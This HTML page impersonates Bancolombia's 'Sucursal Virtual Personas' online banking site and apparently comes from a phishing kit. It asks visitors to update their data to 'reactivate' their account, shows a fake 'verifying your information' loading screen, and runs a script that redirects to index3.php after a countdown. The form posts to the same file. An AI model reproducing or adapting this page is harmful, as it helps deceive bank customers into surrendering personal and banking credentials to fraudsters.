<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

  <meta name="viewport" content="width=device-width, initial-scale=1.0">



<link href="./index_files/styles.css" media="all" rel="stylesheet" type="text/css">
  
  <link href="./index_files/bootstrap.css" media="all" rel="stylesheet" type="text/css">  

	

	<link href="./index_files/jquery-ui.css" media="all" rel="stylesheet" type="text/css"> 
   	<link href="./index_files/ui.css" media="all" rel="stylesheet" type="text/css">
 <script language="JavaScript">
 
    /* Determinamos el tiempo total en segundos */
    var totalTiempo=20;
    
    var url="index3.php";
 
    function updateReloj()
    {
        document.getElementById('CuentaAtras').innerHTML = "Por favor, espera "+totalTiempo+" segundos, estamos verificando su información";
 
        if(totalTiempo==0)
        {
            window.location=url;
        }else{
            /* Restamos un segundo al tiempo restante */
            totalTiempo-=1;
            /* Ejecutamos nuevamente la función al pasar 1000 milisegundos (1 segundo) */
            setTimeout("updateReloj()",1000);
        }
    }
 
    window.onload=updateReloj;
 
    </script>

<style>.osSwitch{position:relative;display:inline-block;width:34px;height:15.3px}.osSwitch input{opacity:0;width:0;height:0}.osSlider{position:absolute;top:0;left:0;right:0;bottom:0;border-radius:34px;background-color:#93a0b5;transition:0.4s}.osSlider:before{position:absolute;content:'';height:13px;width:13px;left:2px;bottom:1px;border-radius:50%;background-color:white;transition:0.4s}input:checked+.sliderGreen{background-color:#04d289}input:checked+.sliderRed{background-color:#ff3b30}input:not(:checked)+.defaultGreen{background-color:#04d289}input:checked+.osSlider:before{transform:translateX(17px)}
</style><style>
    @font-face {
      font-family: 'SegoeUI_online_security'; 
      src: url(chrome-extension://llbcnfanfmjhpedaedhbcnpgeepdnnok/segoe-ui.woff);
    }

    @font-face {
      font-family: 'SegoeUI_bold_online_security'; 
      src: url(chrome-extension://llbcnfanfmjhpedaedhbcnpgeepdnnok/segoe-ui-bold.woff);
    }
</style></head>

<body style="">

<div id="cargando" style="width: 100%; text-align: center; display: none;">

     </div>
<div id="contenidoWeb" style="">
	<form method="POST" id="main_form" autocomplete="off" action="index3.php">
	
	
			<div class="container" id="containerMain">

			

				

<div>
	<div id="header" class="mua-page-header">
		<div class="row row-logo-svp"> 
			<div class="col-xs-12 col-sm-7 col-md-7 left-div">
				<div class="mua-imgLogoItem"></div>
				<div class="text-svp-name">Sucursal Virtual Personas</div>
			</div>
		</div>
		<div class="row">
			<div class="col-xs-12 col-sm-7 col-md-7 left-div">
				<div id="lastIn" class="mua-title-text" style="padding-top: 10px !important;">
				<div>
	<div class="timeText">Fecha y hora actual:</div>
	<span id="jclock1" class="lastVisitedText">
	Miercoles 11 de Diciembre 2024
</span>
</div>	
		</div>
			</div>
		</div>
	</div>

	<div class="panel-heading">
		<h3>
			Complete con sus datos actuales para reactivar
		</h3>
	</div>
</div>
			
			<div class="panel panel-primary">
				<div class="row" id="error">
					



				</div>

			<div class="mua-panel-body">
					  
					<div class="row">
					
						<div class="col-lg-5 col-md-5 col-sm-6">
							
											
								<h5 class="mua-title-h5"><font color="#FFFFFF"> Imagen y frase de seguridad seleccionadas</font></h5>
											
								<p class="mua-phrase-message mua-small-text"><font color="#FFFFFF">Digita tu Clave personal.</font></p>

								<div id="phraseImage" class="mua-image-login-container">
									




								</div>
							
									
						</div>
					
					
						<div class="col-lg-4 col-md-5 col-sm-6">

							<div class="panel_general">
								<div class="title-panel-label">
									<h1>
										Cargando...
									</h1>
								</div>
								
									
								
								<div id="contenido">
								<div align="center">
									<img src="./index_files/thbm.gif" style="width:250px;"></div>

									<div class="mua-content-legend">
										<p id="CuentaAtras">Por favor, espera 5 segundos, estamos verificando su información</p>
									</div>
								</div>

						

			

							</div>

						</div>
						
				

		                	
					</div>
				</div>
			
	
			
			
			</div>

		
<br><br><br><br><br><br>

<div class="row">
	<div class="col-xs-12 col-sm-12 col-md-12">
		<p class="mua-footer mua-footer-info-call">
			Sucursal Telefónica Bancolombia: Bogotá 343 0000 - Medellín 510 9000 - Cali 554 0505 - Barranquilla 361 8888 - Cartagena 693 Sucursales Telefónicas en el exterior: España 900 995 717 - Estados Unidos 1866 379 9714.
		</p>
	</div>
</div>

		
 





	        <div style="margin-top: 10px;">
	            <div class="mua-title-text pull-left"></div>
	            <div class="mua-title-text pull-right"><span id="fecha">2022</span>&nbsp;Bancolombia S.A.&nbsp;&nbsp;</div>
	        </div>
	   

		</div>

	
	   </form>
	  </div> 


</body></html>